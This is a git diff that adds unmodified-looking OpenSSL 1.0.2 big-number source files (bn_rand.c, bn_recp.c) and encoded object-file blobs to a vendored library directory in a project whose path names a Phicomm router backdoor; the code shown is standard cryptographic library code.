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
N5BMWKDwB#?{y(OFmNNhV

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.c
new file mode 100644
index 0000000..7ac71ec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.c
@@ -0,0 +1,289 @@
+/* crypto/bn/bn_rand.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+#include <openssl/rand.h>
+
+static int bnrand(int pseudorand, BIGNUM *rnd, int bits, int top, int bottom)
+{
+    unsigned char *buf = NULL;
+    int ret = 0, bit, bytes, mask;
+    time_t tim;
+
+    if (bits == 0) {
+        BN_zero(rnd);
+        return 1;
+    }
+
+    bytes = (bits + 7) / 8;
+    bit = (bits - 1) % 8;
+    mask = 0xff << (bit + 1);
+
+    buf = (unsigned char *)OPENSSL_malloc(bytes);
+    if (buf == NULL) {
+        BNerr(BN_F_BNRAND, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /* make a random number and set the top and bottom bits */
+    time(&tim);
+    RAND_add(&tim, sizeof(tim), 0.0);
+
+    if (pseudorand) {
+        if (RAND_pseudo_bytes(buf, bytes) == -1)
+            goto err;
+    } else {
+        if (RAND_bytes(buf, bytes) <= 0)
+            goto err;
+    }
+
+#if 1
+    if (pseudorand == 2) {
+        /*
+         * generate patterns that are more likely to trigger BN library bugs
+         */
+        int i;
+        unsigned char c;
+
+        for (i = 0; i < bytes; i++) {
+            RAND_pseudo_bytes(&c, 1);
+            if (c >= 128 && i > 0)
+                buf[i] = buf[i - 1];
+            else if (c < 42)
+                buf[i] = 0;
+            else if (c < 84)
+                buf[i] = 255;
+        }
+    }
+#endif
+
+    if (top != -1) {
+        if (top) {
+            if (bit == 0) {
+                buf[0] = 1;
+                buf[1] |= 0x80;
+            } else {
+                buf[0] |= (3 << (bit - 1));
+            }
+        } else {
+            buf[0] |= (1 << bit);
+        }
+    }
+    buf[0] &= ~mask;
+    if (bottom)                 /* set bottom bit if requested */
+        buf[bytes - 1] |= 1;
+    if (!BN_bin2bn(buf, bytes, rnd))
+        goto err;
+    ret = 1;
+ err:
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, bytes);
+        OPENSSL_free(buf);
+    }
+    bn_check_top(rnd);
+    return (ret);
+}
+
+int BN_rand(BIGNUM *rnd, int bits, int top, int bottom)
+{
+    return bnrand(0, rnd, bits, top, bottom);
+}
+
+int BN_pseudo_rand(BIGNUM *rnd, int bits, int top, int bottom)
+{
+    return bnrand(1, rnd, bits, top, bottom);
+}
+
+#if 1
+int BN_bntest_rand(BIGNUM *rnd, int bits, int top, int bottom)
+{
+    return bnrand(2, rnd, bits, top, bottom);
+}
+#endif
+
+/* random number r:  0 <= r < range */
+static int bn_rand_range(int pseudo, BIGNUM *r, const BIGNUM *range)
+{
+    int (*bn_rand) (BIGNUM *, int, int, int) =
+        pseudo ? BN_pseudo_rand : BN_rand;
+    int n;
+    int count = 100;
+
+    if (range->neg || BN_is_zero(range)) {
+        BNerr(BN_F_BN_RAND_RANGE, BN_R_INVALID_RANGE);
+        return 0;
+    }
+
+    n = BN_num_bits(range);     /* n > 0 */
+
+    /* BN_is_bit_set(range, n - 1) always holds */
+
+    if (n == 1)
+        BN_zero(r);
+    else if (!BN_is_bit_set(range, n - 2) && !BN_is_bit_set(range, n - 3)) {
+        /*
+         * range = 100..._2, so 3*range (= 11..._2) is exactly one bit longer
+         * than range
+         */
+        do {
+            if (!bn_rand(r, n + 1, -1, 0))
+                return 0;
+            /*
+             * If r < 3*range, use r := r MOD range (which is either r, r -
+             * range, or r - 2*range). Otherwise, iterate once more. Since
+             * 3*range = 11..._2, each iteration succeeds with probability >=
+             * .75.
+             */
+            if (BN_cmp(r, range) >= 0) {
+                if (!BN_sub(r, r, range))
+                    return 0;
+                if (BN_cmp(r, range) >= 0)
+                    if (!BN_sub(r, r, range))
+                        return 0;
+            }
+
+            if (!--count) {
+                BNerr(BN_F_BN_RAND_RANGE, BN_R_TOO_MANY_ITERATIONS);
+                return 0;
+            }
+
+        }
+        while (BN_cmp(r, range) >= 0);
+    } else {
+        do {
+            /* range = 11..._2  or  range = 101..._2 */
+            if (!bn_rand(r, n, -1, 0))
+                return 0;
+
+            if (!--count) {
+                BNerr(BN_F_BN_RAND_RANGE, BN_R_TOO_MANY_ITERATIONS);
+                return 0;
+            }
+        }
+        while (BN_cmp(r, range) >= 0);
+    }
+
+    bn_check_top(r);
+    return 1;
+}
+
+int BN_rand_range(BIGNUM *r, const BIGNUM *range)
+{
+    return bn_rand_range(0, r, range);
+}
+
+int BN_pseudo_rand_range(BIGNUM *r, const BIGNUM *range)
+{
+    return bn_rand_range(1, r, range);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.o
new file mode 100644
index 0000000000000000000000000000000000000000..6b5f72a438ff7b07385a878489c5acf5e0795f5e
GIT binary patch
literal 4464
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
LkZo4@b=v;}1w3+Q

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.c
new file mode 100644
index 0000000..6826f93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.c
@@ -0,0 +1,249 @@
+/* crypto/bn/bn_recp.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+void BN_RECP_CTX_init(BN_RECP_CTX *recp)
+{
+    BN_init(&(recp->N));
+    BN_init(&(recp->Nr));
+    recp->num_bits = 0;
+    recp->flags = 0;
+}
+
+BN_RECP_CTX *BN_RECP_CTX_new(void)
+{
+    BN_RECP_CTX *ret;
+
+    if ((ret = (BN_RECP_CTX *)OPENSSL_malloc(sizeof(BN_RECP_CTX))) == NULL)
+        return (NULL);
+
+    BN_RECP_CTX_init(ret);
+    ret->flags = BN_FLG_MALLOCED;
+    return (ret);
+}
+
+void BN_RECP_CTX_free(BN_RECP_CTX *recp)
+{
+    if (recp == NULL)
+        return;
+
+    BN_free(&(recp->N));
+    BN_free(&(recp->Nr));
+    if (recp->flags & BN_FLG_MALLOCED)
+        OPENSSL_free(recp);
+}
+
+int BN_RECP_CTX_set(BN_RECP_CTX *recp, const BIGNUM *d, BN_CTX *ctx)
+{
+    if (!BN_copy(&(recp->N), d))
+        return 0;
+    BN_zero(&(recp->Nr));
+    recp->num_bits = BN_num_bits(d);
+    recp->shift = 0;
+    return (1);
+}
+
+int BN_mod_mul_reciprocal(BIGNUM *r, const BIGNUM *x, const BIGNUM *y,
+                          BN_RECP_CTX *recp, BN_CTX *ctx)
+{
+    int ret = 0;
+    BIGNUM *a;
+    const BIGNUM *ca;
+
+    BN_CTX_start(ctx);
+    if ((a = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if (y != NULL) {
+        if (x == y) {
+            if (!BN_sqr(a, x, ctx))
+                goto err;
+        } else {
+            if (!BN_mul(a, x, y, ctx))
+                goto err;
+        }
+        ca = a;
+    } else
+        ca = x;                 /* Just do the mod */
+
+    ret = BN_div_recp(NULL, r, ca, recp, ctx);
+ err:
+    BN_CTX_end(ctx);
+    bn_check_top(r);
+    return (ret);
+}
+
+int BN_div_recp(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m,
+                BN_RECP_CTX *recp, BN_CTX *ctx)
+{
+    int i, j, ret = 0;
+    BIGNUM *a, *b, *d, *r;
+
+    BN_CTX_start(ctx);
+    a = BN_CTX_get(ctx);
+    b = BN_CTX_get(ctx);
+    if (dv != NULL)
+        d = dv;
+    else
+        d = BN_CTX_get(ctx);
+    if (rem != NULL)
+        r = rem;
+    else
+        r = BN_CTX_get(ctx);
+    if (a == NULL || b == NULL || d == NULL || r == NULL)
+        goto err;
+
+    if (BN_ucmp(m, &(recp->N)) < 0) {
+        BN_zero(d);
+        if (!BN_copy(r, m))
+            return 0;
+        BN_CTX_end(ctx);
+        return (1);
+    }
+
+    /*
+     * We want the remainder Given input of ABCDEF / ab we need multiply
+     * ABCDEF by 3 digests of the reciprocal of ab
+     */
+
+    /* i := max(BN_num_bits(m), 2*BN_num_bits(N)) */
+    i = BN_num_bits(m);
+    j = recp->num_bits << 1;
+    if (j > i)
+        i = j;
+
+    /* Nr := round(2^i / N) */
+    if (i != recp->shift)
+        recp->shift = BN_reciprocal(&(recp->Nr), &(recp->N), i, ctx);
+    /* BN_reciprocal could have returned -1 for an error */
+    if (recp->shift == -1)
+        goto err;
+
+    /*-
+     * d := |round(round(m / 2^BN_num_bits(N)) * recp->Nr / 2^(i - BN_num_bits(N)))|
+     *    = |round(round(m / 2^BN_num_bits(N)) * round(2^i / N) / 2^(i - BN_num_bits(N)))|
+     *   <= |(m / 2^BN_num_bits(N)) * (2^i / N) * (2^BN_num_bits(N) / 2^i)|
+     *    = |m/N|
+     */
+    if (!BN_rshift(a, m, recp->num_bits))
+        goto err;
+    if (!BN_mul(b, a, &(recp->Nr), ctx))
+        goto err;
+    if (!BN_rshift(d, b, i - recp->num_bits))
+        goto err;
+    d->neg = 0;
+
+    if (!BN_mul(b, &(recp->N), d, ctx))
+        goto err;
+    if (!BN_usub(r, m, b))
+        goto err;
+    r->neg = 0;
+
+#if 1
+    j = 0;
+    while (BN_ucmp(r, &(recp->N)) >= 0) {
+        if (j++ > 2) {
+            BNerr(BN_F_BN_DIV_RECP, BN_R_BAD_RECIPROCAL);
+            goto err;
+        }
+        if (!BN_usub(r, r, &(recp->N)))
+            goto err;
+        if (!BN_add_word(d, 1))
+            goto err;
+    }
+#endif
+
+    r->neg = BN_is_zero(r) ? 0 : m->neg;
+    d->neg = m->neg ^ recp->N.neg;
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    bn_check_top(dv);
+    bn_check_top(rem);
+    return (ret);
+}
+
+/*
+ * len is the expected size of the result We actually calculate with an extra
+ * word of precision, so we can do faster division if the remainder is not
+ * required.
+ */
+/* r := 2^len / m */
+int BN_reciprocal(BIGNUM *r, const BIGNUM *m, int len, BN_CTX *ctx)
+{
+    int ret = -1;
+    BIGNUM *t;
+
+    BN_CTX_start(ctx);
+    if ((t = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    if (!BN_set_bit(t, len))
+        goto err;
+
+    if (!BN_div(r, NULL, t, m, ctx))
+        goto err;
+
+    ret = len;
+ err:
+    bn_check_top(r);
+    BN_CTX_end(ctx);
+    return (ret);
+}
